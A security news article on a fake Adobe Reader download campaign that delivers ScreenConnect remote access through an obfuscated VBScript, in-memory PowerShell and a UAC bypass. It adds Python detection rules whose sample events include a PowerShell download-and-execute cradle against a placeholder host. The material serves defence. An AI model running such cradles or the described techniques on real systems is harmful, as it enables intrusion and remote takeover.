
Fake Adobe Download Spreads Remote Access Malware Using ScreenConnect


A new cyberattack campaign is targeting users by disguising malware as a legitimate download of Adobe Acrobat Reader. The attack tricks users into installing remote access software without their knowledge, giving attackers full control of the system.

Security researchers at Zscaler ThreatLabz discovered this campaign in February 2026. The attack uses advanced techniques to stay hidden and avoid detection.

The attack starts with a fake website that looks similar to Adobe’s official page. When a user visits the site and clicks the download button, a malicious file is automatically downloaded. This file is a VBScript named Acrobat_Reader_V112_6971.vbs, which pretends to be a normal installer. This script acts as the initial loader and is designed to evade static analysis by dynamically constructing critical objects and commands at runtime.

The script is heavily obfuscated. It does not expose any clear indicators. Instead of writing commands directly, it builds them during execution. This is a common trick, but the level of obfuscation here suggests the attackers want to avoid both static and basic behavioral detection.

After execution, the script launches PowerShell with execution policy bypass. This is a red flag. It then pulls the next stage from a remote source and executes everything in memory. No files are dropped on disk, which makes forensic analysis difficult.

This in-memory execution is the core strength of this attack. It reduces artifacts and keeps the attack under the radar. The attackers also manipulate the process identity. The malware pretends to be a legitimate Windows process. Many tools still rely on process names and metadata, so this can help bypass detection.


Another interesting part is the privilege escalation. The attack abuses auto-elevated COM objects to bypass UAC. This means it gains admin-level access without showing any prompt. This is not new, but combining it with fileless execution makes it more effective.

In the final stage, the attack installs ConnectWise ScreenConnect. This is a legitimate tool, which is why many security solutions may not flag it. Once installed, the attacker gets full remote access. At this point, they can do anything: data theft, lateral movement, or even long-term persistence.

This campaign clearly shows that attackers aren’t relying on custom malware anymore. They are using trusted tools and system features to stay hidden and to avoid detection by traditional antivirus, so behavioral monitoring is needed to catch such activity. Unusual PowerShell activity, silent MSI installations, and unexpected use of remote access tools should be treated seriously.
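As an added illustration of the behavioral monitoring described above (this is example code written for this article, not part of the original report or of Zscaler's research), the Python below runs a handful of detection rules for this chain over constructed process-creation events; the user paths, URL and MSI file name in the sample are made up, and only the VBScript name comes from the article.

```python
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

def _exe(path):
    """Lower-cased file name of a Windows image path."""
    return path.lower().rsplit("\\", 1)[-1]

# Each rule takes an event dict with keys parent_image, image and command_line.
def script_from_downloads(ev):
    cl = ev["command_line"].lower()
    return _exe(ev["image"]) in SCRIPT_HOSTS and "\\downloads\\" in cl and ".vbs" in cl

def script_host_spawns_powershell(ev):
    return _exe(ev["parent_image"]) in SCRIPT_HOSTS and _exe(ev["image"]) == "powershell.exe"

def powershell_bypass(ev):
    cl = ev["command_line"].lower()
    return _exe(ev["image"]) == "powershell.exe" and re.search(r"-(executionpolicy|ep|exec)\s+bypass", cl) is not None

def in_memory_cradle(ev):
    cl = ev["command_line"].lower()
    pat = r"\b(iex|invoke-expression|downloadstring|downloaddata|invoke-webrequest|iwr)\b|-enc(odedcommand)?\b"
    return _exe(ev["image"]) == "powershell.exe" and re.search(pat, cl) is not None

def silent_msi(ev):
    return _exe(ev["image"]) == "msiexec.exe" and re.search(r"/q[nb]?\b|/quiet\b", ev["command_line"].lower()) is not None

def remote_access_tool(ev):
    return "screenconnect" in (ev["image"] + " " + ev["command_line"]).lower()

RULES = [script_from_downloads, script_host_spawns_powershell, powershell_bypass,
         in_memory_cradle, silent_msi, remote_access_tool]

def triage(events):
    """Map event index -> names of matching rules; events that match nothing are omitted."""
    hits = {}
    for i, ev in enumerate(events):
        names = [r.__name__ for r in RULES if r(ev)]
        if names:
            hits[i] = names
    return hits

# Constructed sample telemetry (Sysmon Event ID 1 style fields); paths, URL and MSI name are made up.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe "C:\Users\alice\Downloads\Acrobat_Reader_V112_6971.vbs"'},
    {"parent_image": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://stage2.example.invalid/x')\""},
    {"parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /i C:\Users\alice\AppData\Local\Temp\screenconnect_client.msi /qn"},
    {"parent_image": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\svchost.exe",
     "command_line": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for idx, names in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], "->", ", ".join(names))
```

An event that trips several rules at once (a script host launching PowerShell with a bypass and a download cradle) is the combination worth alerting on; any single rule alone will also fire on legitimate administration.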

I advise users not to download software from unknown sources, even if the page looks real. They must always check the website URL before clicking the download button.
